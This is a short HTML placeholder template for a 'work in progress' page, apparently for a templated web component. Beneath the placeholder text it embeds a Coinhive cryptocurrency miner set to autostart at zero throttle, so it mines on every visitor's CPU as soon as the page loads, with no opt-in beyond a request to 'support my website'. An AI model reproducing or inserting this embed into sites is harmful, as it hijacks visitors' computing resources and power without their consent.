<h1>{{componentPackage["Title"]}} is in progress...</h1>
<p>
  {{componentPackage["Title"]}} works!
</p>
<br/>
<br/>
<br/>
<div style="position: absolute; bottom: 50; align-content: center">
  <h4>Consider supporting my website by mining some coins:</h4>
  <div class="coinhive-miner" 
      style="width: 100%; height: 200px;"
      data-autostart="true"
      data-throttle="0"
      data-background="#000" data-text="#eee" data-action="#0f0" data-graph="#555" data-whitelabel="false"
      data-key="9NTTOK5bWjqeH6gtN4zrz5H2n2JDMUdL">
    <em>Loading...</em>
  </div>
</div>
